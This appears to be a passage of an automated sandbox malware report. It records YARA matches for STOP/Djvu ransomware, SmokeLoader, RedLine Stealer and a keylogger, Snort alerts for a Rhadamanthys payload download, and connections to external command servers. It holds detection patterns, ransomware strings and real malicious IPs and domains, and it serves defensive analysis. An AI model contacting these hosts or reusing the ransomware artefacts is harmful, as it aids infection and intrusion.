27.2.DC3D.exe.22d15a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
27.2.DC3D.exe.22d15a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
25.2.ECAC.exe.23d15a0.1.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth (Nextron Systems)	0xdf7ea:$s1: http:// 0xfd898:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xfdf28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xfdf4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101b2b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xffa26:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xdf7ea:$f1: http://
25.2.ECAC.exe.23d15a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
25.2.ECAC.exe.23d15a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
25.2.ECAC.exe.23d15a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
12.3.rundll32.exe.156f174f9c8.55.unpack	SUSP_ENV_Folder_Root_File_Jan23_1	Detects suspicious file path pointing to the root of a folder easily accessible via environment variables	Florian Roth (Nextron Systems)	0x38d8cc:$xr1: %AppData%\com.liber
42.2.A4A.exe.23215a0.1.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth (Nextron Systems)	0xdf7ea:$s1: http:// 0xfd898:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xfdf28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xfdf4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101b2b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xffa26:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xdf7ea:$f1: http://
42.2.A4A.exe.23215a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
42.2.A4A.exe.23215a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
42.2.A4A.exe.23215a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
42.2.A4A.exe.23215a0.1.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth (Nextron Systems)	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
42.2.A4A.exe.23215a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
42.2.A4A.exe.23215a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
42.2.A4A.exe.23215a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
12.3.rundll32.exe.156f14a6d78.54.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
12.3.rundll32.exe.156f14aed98.53.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
12.3.rundll32.exe.156f174f9c8.56.unpack	SUSP_ENV_Folder_Root_File_Jan23_1	Detects suspicious file path pointing to the root of a folder easily accessible via environment variables	Florian Roth (Nextron Systems)	0x38d8cc:$xr1: %AppData%\com.liber
12.3.rundll32.exe.156f174f9c8.57.unpack	SUSP_ENV_Folder_Root_File_Jan23_1	Detects suspicious file path pointing to the root of a folder easily accessible via environment variables	Florian Roth (Nextron Systems)	0x38d8cc:$xr1: %AppData%\com.liber
12.3.rundll32.exe.156f14f0d38.51.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Click to see the 60 entries

Snort Signatures

ET TROJAN Rhadamanthys Stealer - Payload Download Request - Source IP: 192.168.2.6 - Destination IP: 179.43.176.6

Timestamp:	192.168.2.6179.43.176.649718802043202 02/15/23-16:04:35.265265
SID:	2043202
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query to a *.top domain - Likely Hostile - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.859504532023883 02/15/23-16:04:31.105143
SID:	2023883
Source Port:	59504
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ETPRO TROJAN Rhadamanthys Stealer - Payload Response - Source IP: 179.43.176.6 - Destination IP: 192.168.2.6

Timestamp:	179.43.176.6192.168.2.680497182853001 02/15/23-16:04:35.292249
SID:	2853001
Source Port:	80
Destination Port:	49718
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jfevcbs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: potunulit.org

Source: unknown	HTTPS traffic detected: 176.61.150.108:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 190.114.9.88:443 -> 192.168.2.6:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 67.199.248.10:443 -> 192.168.2.6:49790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.6:49794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.36.158.100:443 -> 192.168.2.6:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.96.151.46:443 -> 192.168.2.6:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.154.253.152:443 -> 192.168.2.6:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.6:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.6:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.15.156.204:443 -> 192.168.2.6:49837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49843 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49850 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49852 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 0000000B.00000002.375761103.00000000021C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.422932129.00000000020C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.287959121.0000000000590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.375723572.0000000002190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.422753808.0000000000620000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.395645778.00000000021B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.288034610.0000000000711000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.395590082.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: Yara match	File source: 12.3.rundll32.exe.156f14a6d78.54.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.rundll32.exe.156f14aed98.53.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.rundll32.exe.156f14f0d38.51.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000003.358032607.00000156F15A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5500, type: MEMORYSTR

Source: 1128.exe, 00000009.00000002.356909218.0000000000EAA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: rundll32.exe, 0000000C.00000003.381473884.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: NtUserGetRawInputData

Spam, unwanted Advertisements and Ransom Demands

Yara detected Djvu Ransomware

Source: Yara match	File source: 27.2.DC3D.exe.22d15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.A4A.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.A4A.exe.23e15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.ECAC.exe.23d15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.DC3D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.A4A.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.DC3D.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.ECAC.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.A4A.exe.23e15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.ECAC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.DC3D.exe.22d15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.ECAC.exe.23d15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.A4A.exe.23215a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.A4A.exe.23215a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000002.413944051.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.617050897.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.458356250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.417250083.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.453835364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.540094802.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.382455301.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: A4A.exe PID: 1332, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: A4A.exe PID: 2208, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ECAC.exe PID: 6092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: DC3D.exe PID: 3344, type: MEMORYSTR

Found potential ransomware demand text

Source: rundll32.exe, 0000000C.00000003.386425445.00000156F12B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: ?_Mtx_unlock@threads@stdext@@YAXPEAX@Z
Source: rundll32.exe, 0000000C.00000003.386425445.00000156F12B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ
Source: rundll32.exe, 0000000C.00000003.386425445.00000156F12B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: ?_Unlock@?$basic_streambuf@GU?$char_traits@G@std@@@std@@UEAAXXZ
Source: rundll32.exe, 0000000C.00000003.386425445.00000156F12B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: ?_Unlock@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@UEAAXXZ

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 27.2.DC3D.exe.22d15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 27.2.DC3D.exe.22d15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 18.2.A4A.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 18.2.A4A.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.2.A4A.exe.23e15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 13.2.A4A.exe.23e15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.2.ECAC.exe.23d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.2.ECAC.exe.23d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 31.2.DC3D.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 31.2.DC3D.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 18.2.A4A.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 18.2.A4A.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 31.2.DC3D.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 31.2.DC3D.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 29.2.ECAC.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 29.2.ECAC.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.42FE.exe.340000.0.unpack, type: UNPACKEDPE	Matched rule: Detects downloader / injector Author: ditekSHen
Source: 13.2.A4A.exe.23e15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 13.2.A4A.exe.23e15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 29.2.ECAC.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 29.2.ECAC.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 27.2.DC3D.exe.22d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 27.2.DC3D.exe.22d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.2.ECAC.exe.23d15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.2.ECAC.exe.23d15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 42.2.A4A.exe.23215a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 42.2.A4A.exe.23215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 42.2.A4A.exe.23215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 42.2.A4A.exe.23215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000E.00000002.705303961.0000000000606000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000014.00000002.439049903.00000000005E6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000E.00000002.706906368.0000000002210000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.287939420.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.288156883.0000000000746000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000010.00000002.427978506.00000000005F6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000014.00000002.438844235.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000B.00000002.375761103.00000000021C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000019.00000002.413944051.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000002A.00000002.617050897.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000001B.00000002.416891695.0000000002232000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000017.00000002.422729797.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000001F.00000002.458356250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000001F.00000002.458356250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000017.00000002.422861272.0000000000666000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000017.00000002.422932129.00000000020C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000001B.00000002.417250083.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000002A.00000002.587743224.000000000228A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.287959121.0000000000590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000019.00000002.413738887.0000000002337000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000F.00000002.395568327.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000B.00000002.375723572.0000000002190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000D.00000002.382364592.0000000002258000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000B.00000002.375676925.00000000007C6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000017.00000002.422753808.0000000000620000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000F.00000002.395494716.0000000000616000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000F.00000002.395645778.00000000021B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.288034610.0000000000711000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000001D.00000002.453835364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000001D.00000002.453835364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000002.375648108.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000012.00000002.540094802.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000012.00000002.540094802.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000F.00000002.395590082.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000010.00000002.427822773.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000D.00000002.382455301.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: A4A.exe PID: 1332, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: A4A.exe PID: 2208, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: ECAC.exe PID: 6092, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: DC3D.exe PID: 3344, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown

Detected VMProtect packer

Source: llpb1133.exe.17.dr

Static PE information: .vmp0 and .vmp1 section names

Source: C:\Users\user\AppData\Local\Temp\DE4C.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4776 -s 520

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00412C56	0_2_00412C56
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00410CE6	0_2_00410CE6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00411237	0_2_00411237
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00413767	0_2_00413767
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00411788	0_2_00411788
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00746000	0_2_00746000
Source: C:\Users\user\AppData\Local\Temp\1128.exe	Code function: 9_2_004080D0	9_2_004080D0
Source: C:\Users\user\AppData\Local\Temp\1128.exe	Code function: 9_2_0040B086	9_2_0040B086
Source: C:\Users\user\AppData\Local\Temp\1128.exe	Code function: 9_2_0040C92F	9_2_0040C92F
Source: C:\Users\user\AppData\Local\Temp\1128.exe	Code function: 9_2_0040D535	9_2_0040D535
Source: C:\Users\user\AppData\Local\Temp\1128.exe	Code function: 9_2_0040CE71	9_2_0040CE71
